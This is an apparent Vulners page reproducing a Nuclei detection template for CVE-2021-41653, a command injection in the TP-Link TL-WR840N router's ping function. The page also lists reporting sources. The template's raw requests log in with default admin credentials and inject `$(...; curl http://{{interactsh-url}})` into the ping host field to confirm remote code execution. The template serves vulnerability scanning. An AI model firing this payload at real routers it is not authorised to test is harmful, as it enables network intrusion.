| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| CVE-2021-41653 | 13 Nov 202115:15 | – | attackerkb | |
| The vulnerability of the PING function implementation in TP-Link’s microprogrammed router TL-WR840N EU v5 allows a hacker to execute arbitrary code. | 20 Dec 202100:00 | – | bdu_fstec | |
| CVE-2021-41653 | 13 Nov 202118:40 | – | circl | |
| Tp-link TL-WR840N 代码注入漏洞 | 13 Nov 202100:00 | – | cnnvd | |
| Tp-link TL-WR840N Code Injection Vulnerability | 16 Nov 202100:00 | – | cnvd | |
| TP-Link TL-WR840N Router Command Injection (CVE-2021-41653) | 8 Dec 202100:00 | – | checkpoint_advisories | |
| CVE-2021-41653 | 13 Nov 202114:18 | – | cve | |
| CVE-2021-41653 | 13 Nov 202114:18 | – | cvelist | |
| CVE-2021-41653 | 13 Nov 202115:15 | – | nvd | |
| CVE-2021-41653 | 13 Nov 202115:15 | – | osv |
id: CVE-2021-41653
info:
name: TP-Link - OS Command Injection
author: gy741
severity: critical
description: The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a specially crafted payload in an IP address input field.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network.
remediation: Upgrade the firmware to at least version "TL-WR840N(EU)_V5_211109".
reference:
- https://k4m1ll0.com/cve-2021-41653.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-41653
- https://www.tp-link.com/us/press/security-advisory/
- http://tp-link.com
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-41653
cwe-id: CWE-94
epss-score: 0.7747
epss-percentile: 0.99504
cpe: cpe:2.3:o:tp-link:tl-wr840n_firmware:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: tp-link
product: tl-wr840n_firmware
tags: cve2021,cve,tplink,rce,router,tp-link,vkev,vuln
variables:
useragent: '{{rand_base(6)}}'
http:
- raw:
- |
POST /cgi?2 HTTP/1.1
Host: {{Hostname}}
Content-Type: text/plain
Referer: http://{{Hostname}}/mainFrame.htm
Cookie: Authorization=Basic YWRtaW46YWRtaW4=
[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6
dataBlockSize=64
timeout=1
numberOfRepetitions=4
host=$(echo 127.0.0.1; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}')
X_TP_ConnName=ewan_ipoe_d
diagnosticsState=Requested
- |
POST /cgi?7 HTTP/1.1
Host: {{Hostname}}
Content-Type: text/plain
Referer: http://{{Hostname}}/mainFrame.htm
Cookie: Authorization=Basic YWRtaW46YWRtaW4=
[ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: word
part: interactsh_request
words:
- "User-Agent: {{useragent}}"
# digest: 4a0a00473045022100e1ed7f83ba3a51e54d7feffdf50abad55003ea3bb0b428874fbb2322243e7332022031c6e9509136f712247daf69d73fcdbe82d48ba0c7c449e22119b7ce2b55cc4b:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation